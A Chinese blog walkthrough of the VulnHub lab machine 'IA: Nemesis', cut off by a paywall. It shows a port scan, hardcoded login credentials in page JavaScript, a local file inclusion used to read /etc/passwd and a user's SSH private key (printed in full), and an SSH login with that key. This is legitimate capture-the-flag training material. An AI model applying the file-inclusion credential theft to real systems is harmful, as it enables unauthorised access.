IA: Nemesis (1.0.1) vulnhub walkthrough

最新推荐文章于 2023-12-16 18:28:24 发布
最新推荐文章于 2023-12-16 18:28:24 发布
阅读量1.2k 收藏
点赞数
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xdeclearn/article/details/109309103
版权

IA: Nemesis (1.0.1)

虚拟机页面:http://www.vulnhub.com/entry/ia-nemesis-101,582/

Description

  • Difficulty: Intermediate to Hard
  • Goal: Get the root shell and read all the 3 flags.
  • Information: You need some good encryption and programming skills to root this box. Please solve this challenge by using only the intended way, any unintended way will not be apprecitated.
  • If you need any hints, you can contact us on Twitter (@infosecarticles)

服务探测

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
52845/tcp open  http    nginx 1.14.2
52846/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

web渗透测试

80端口服务有一个登录入口,在页面的validateForm函数中得到了用户名和密码,但是登录后没有任何东西。

<!DOCTYPE html>
function validateForm() {
   
  var x = document.forms["myForm"]["uname"].value;
  var y = document.forms["myForm"]["pass"].value; 
  if (x == "") {
   
    alert("Name must be filled out");
    return false;
  }
 if (y == "") {
   
    alert("Password must be filled out");
    return false; 
}
 if (x == "hacker_in_the_town" && y == "thanos")
	{
   
		document.write("You will be redirected to main page in 3 sec.");
            	setTimeout('validate()', 3000);
	}
}

紧接着访问52845端口,在#contact中尝试输入任意信息然后提交,出现提示Message has been saved in a file,于是在Message中输入/etc/passwd,成功实现了LFI。
lfi
passwd

之后,尝试了一些常见log读取失败后,尝试ssh登录thanos,发现需要私钥认证。

kali@kali:~$ ssh -p 52846 thanos@192.168.56.42 
thanos@192.168.56.42: Permission denied (publickey).

尝试利用LFI获取thanos私钥/home/thanos/.ssh/id_rsa,成功并实现ssh登录,获取到第一个flag。

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA1H2rDU6AnY2LSnOSLpXxZ7Fb0HPfQQds2SdQzvBH6NNSIuLFsebl
2fAgeirNWD2LHs3C/8jPyy1GRsxFd9U0yF2hO0aRBASSWU+WzLTIeLvaPircn8P1l528cX
HoWvXnzKsZLibrFos6H3krrRJ8Y+U/BI8dPHVEc35j6z79kjZo9ywrCRFigsjnG/YnPfCi
ZwgxwUBHdJxyuugc9PiEMaDVGVL84gVNknR4INOLCCa8kSGoHfuW0+D67pDgtqzRup4io0
PurjeH9183JrSJe5Wa0aL7mz2aeaVRLS9ICCfmLp+Rp3nfGDolATqWpbtfvRUAbplL1R8N
VVyKFPkptQAAA8j/NR2S/zUdkgAAAAdzc2gtcnNhAAABAQDUfasNToCdjYtKc5IulfFnsV
vQc99BB2zZJ1DO8Efo01Ii4sWx5uXZ8CB6Ks1YPYsezcL/yM/LLUZGzEV31TTIXaE7RpEE
BJJZT5bMtMh4u9o+Ktyfw/WXnbxxceha9efMqxkuJusWizofeSutEnxj5T8Ejx08dURzfm
PrPv2SNmj3LCsJEWKCyOcb9ic98KJnCDHBQEd0nHK66Bz0+IQxoNUZUvziBU2SdHgg04sI
JryRIagd+5bT4PrukOC2rNG6niKjQ+6uN4f3XzcmtIl7lZrRovubPZp5pVEtL0gIJ+Yun5
Gned8YOiUBOpalu1+9FQBumUvVHw1VXIoU+Sm1AAAAAwEAAQAAAQEAkBkElYqF59IkAoIr
QNJIGfSJeewKGxRI+V4TC7KgYUBlM+kq/cDCYK/Zpl8+T7e0j1gkA8ePOo5iWQKPnXsFR1
dPTl5FWz8qa8xwTDPQuydREdWJNgLymjXKo/gGBSE7Z20kL0sPI4OZD9zhBIZDuo6s1I+k
2OoBWHz+j3pxBOQKmApkbtwkKSli75xuzYaDt/OMy8/t+ML5ocTXSqJ4p00uH231OLCwKK
Ek5u1mrJQ07SYIK7g1pr1nwru9eMf4lKcT4KKPvPmaNorooYo86QO9bQk61DCjMEdh0uI7
hwUd5welBALIhUU3JFBznj7Xo8WnK0JFOJD2qAJQrFtz4QAAAIBJPdwoMasCzCOdLtkbC+
DPFhHH1cJ/kPUusNMV03xkOk0XjsZ06gwnvWQSTp0bE+zC8YmKCj23bNP/XDBhAogmVTqw
S4a+lO5gJutRT2rFSYBc58NIH3A4/IPKLbqy1+8+WuIce98eHsUliiTpcDwv5JYUkWHjCx
CKtfPIcrW8YAAAAIEA7dSwRfEti3jd/Prm/zfb1sbkwpo6oiLCum3E9fLIi0iWmqUFcTvd
xbh5xOweywAUs/jYpPw3pK3ZIwQC8tGbHKNVDPtXBSk+5qTRZv5FvAZTH9xiQeSGNiPPMi
FWOc1CpeNywEDY/k43wyIQSIeXjR1z8ZxFkf8u/l4poFE2eX0AAACBAOS5ZqSQ9cbv8Rm2
zIUmIQvBvG0cegsKaDx4ZMK0I2J3kLKM+qWbQbSxVWt/NOHMQGfrDD2MIX61fN7JjqL4E0
KzmgYQleQRM3U3RGpynnimPBzd3NmvpVxBFb3wg/U9rIlrGzzUkwQZRtntox6k3jka8oHd
U5RDT6RIBqdYiiaZAAAADnRoYW5vc0BuZW1lc2lzAQIDBA==
-----END OPENSSH PRIVATE KEY-----

kali@kali:~$ ssh -p 52846 -i id thanos@192.168.56.42 
Linux nemesis 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 26 08:48:39 2020 from 127.0.0.1
thanos@nemesis:~$ ls -all
total 40
drwxr-xr-x 4 thanos thanos 4096 Oct 25 10:05 .
drwxr-xr-x 4 ro
最低0.47元/天 解锁文章
xdeclearn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
靶机渗透练习89-IANemesis (1.0.1)
hirak0的博客
05-01 3336
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-nemesis-101,582/ Description Difficulty: Intermediate to Hard Goal: Get the root shell and read all the 3 flags. Information: You need some good encryption and programming skills to root this box. Please solve t
靶机渗透练习87-IA:Keyring (1.0.1)
hirak0的博客
04-30 1324
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-keyring-101,718/ Description Difficulty: Intermediate Goal: Get the root shell and read all the 2 flags. Information: No hints will be provided before 24 hours of the release. Try Harder! If you need any hints,
Vulnhub-IA: KEYRING (1.0.1)渗透
最新发布
laoyanCZ的博客
12-16 928
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
渗透练习 Vulnhub靶场 Keyring
hljzzj的博客
02-15 1859
No.26 Keyring 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-keyring-101,718/ 靶场: VulnHub.com 靶机名称: IA: Keyring (1.0.1) 难度: 简单-中等 发布时间: 2021年7月30日 目标: 2个flag 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -sP 19
渗透练习 Vulnhub靶场 Nemesis
hljzzj的博客
02-15 1844
No.28 Nemesis 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-nemesis-101,582/ 靶场: VulnHub.com 靶机名称: IA: Nemesis (1.0.1) 难度: 中等-困难 发布时间: 2020年10月25日 提示信息: 这个盒子是为了提高Linux特权升级和CMS技能而创建的,我希望你们喜欢。 目标: 2个flag 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自
NTP:Nemesis 传输协议(Win32、Linux、OS2)
07-11
复仇者传输协议 (NTP) (NTP) 是与 Windows、Linux 和 OS/2 中的 BBS 程序一起使用的文件传输客户端/服务器集。 用户将启动用户端(服务器)应用程序。 一旦连接到 bbs,他们就会选择使用 NTP 协议下载。...
nemesis:命令行网络数据包制作和注入实用程序
05-14
NEMESIS-Craft.io与注塑 Nemesis项目被设计为基于命令行的,可移植的人类IP堆栈,适用于类似UNIX和Windows的系统。 该套件按协议细分,应允许对来自简单shell脚本的注入数据包进行有用的脚本编写。 始终可以从...
Arch i3Nemesis:弓i3Nemesis-开源
05-27
通过Arch i3Nemesis向自己介绍平铺Windows管理器的世界。
Captains-Chair:基于 Nemesis 中删除场景的 DOMod
06-07
船长椅 15130.1 基于从 Nemesis 中删除的场景的 DOMod。 这个 DOMod 使用 CSS 缩放功能,应该适用于各种设备。 除非纵横比与原始 360x640 相比太严重,否则大多数设备都适用。 使用的功能之一是 DOMLauncher 的未接...
spawncamping-nemesis:软件工程
07-06
"spawncamping-nemesis"可能是一个项目或工具的名字,暗示了它与软件工程中的某个特定问题或挑战有关,可能是针对“spawncamping”现象的一种解决方案。然而,由于提供的信息有限,我们需要进一步探索才能确定其确切...
Vulnhub-keyring靶机
lionwerson的博客
12-06 3018
keyring下载地址https://download.vulnhub.com/ia/keyring-v1.01.ova1.下载靶机,网络改为桥接模式然后打开靶机,nmap扫描一下: nmap.exe -p- 192.168.0.15 开放ssh的22端口和http的80端口,ssh端口无法登录,设置了只能用密钥登录。 先注册一个用户,admin用户显示已经被注册了,只能换一个注册: 后台非常简陋,看来不是cms,路径扫描找到一个history.php的文件。 histor.
[网络安全学习篇79]:Geisha: 1 Vulnhub 实战
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-29 950
往期博文: [网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵 [网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵 [网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵 [网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵 [网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵 [网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵 [网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵 [网络安全学习篇76]:渗透测试实战-DC-8-靶机入侵 [网络安全学习篇7
SECARMY VILLAGE: GRAYHAT CONFERENCE vulnhub walkthrough
xdeclearn的博客
11-14 1784
SECARMY VILLAGE: GRAYHAT CONFERENCE 虚拟机地址:https://download.vulnhub.com/secarmyvillage/SECARMY-VILLAGE-OSCP-GIVEAWAY.ova 主机探测、端口扫描这里就省略了,每次都写显得冗余了。 flag1 访问80端口,没有什么有价值信息,先dirb跑一下目录 ---- Scanning URL: http://192.168.132.141/ ---- ==> DIRECTORY: http://19
VIKINGS: 1 vulnhub walkthrough
xdeclearn的博客
09-16 1545
虚拟机地址 : https://www.vulnhub.com/entry/vikings-1,741/ infomation PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 访问web。 对目录site进行目录和文件爆破,发现了war.txt。 ➜ vikings gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://
Orasi: 1 vulnhub walkthrough
xdeclearn的博客
03-11 1382
下载地址:http://www.vulnhub.com/entry/orasi-1,660/ Hint :just one useless little dot 0x01 信息收集到获取shell 端口扫描: 使用anonymous访问ftp,获取到一个文件:url。该文件为一个共享连接库。先看看main函数: 于是将insert中的每一个字符转换为acsii码,得到一串字符/sh4d0w$s,看起来像是url。 访问80端口,得到一串奇怪的字符,看着有点像口令字典工具crunch的参数,等一下还有用。
Shuriken: 1 vulnhub walkthrough
xdeclearn的博客
12-03 1189
Shuriken: 1 vulnhub地址:http://www.vulnhub.com/entry/shuriken-1,600/ 0x01 信息收集到获取shell 服务器只开放了80端口,dirb爬取目录。 ==> DIRECTORY: http://192.168.56.121/css/ ==> DIRECTORY: http://192.168.56.121/img/
Warzone: 1 vulnhub walkthrough
xdeclearn的博客
10-27 922
Warzone: 1 虚拟机页面:http://www.vulnhub.com/entry/warzone-1,589/ Description Info : Created and Tested in Virtual Box, maybe you need to write code Based on : Crypto Scenario : You are trying to gain access to the enemy system Mission : Your mission is to ge
Warzone: 3 (Exogen) vulnhub walkthrough
xdeclearn的博客
12-03 792
Warzone: 3 (Exogen) vulnhub地址:http://www.vulnhub.com/entry/warzone-3-exogen,606/ 0x01 信息收集到获取shell PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 4444/tcp op
Nemesis IP地址欺骗攻击 命令
06-08
Nemesis是一款常用的网络安全工具,可以构造和发送各种类型的网络数据包,包括IP欺骗、ARP欺骗等。以下是使用Nemesis进行IP地址欺骗攻击的命令示例: 1. 发送TCP SYN数据包: ``` sudo nemesis tcp -S -v -d eth0 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值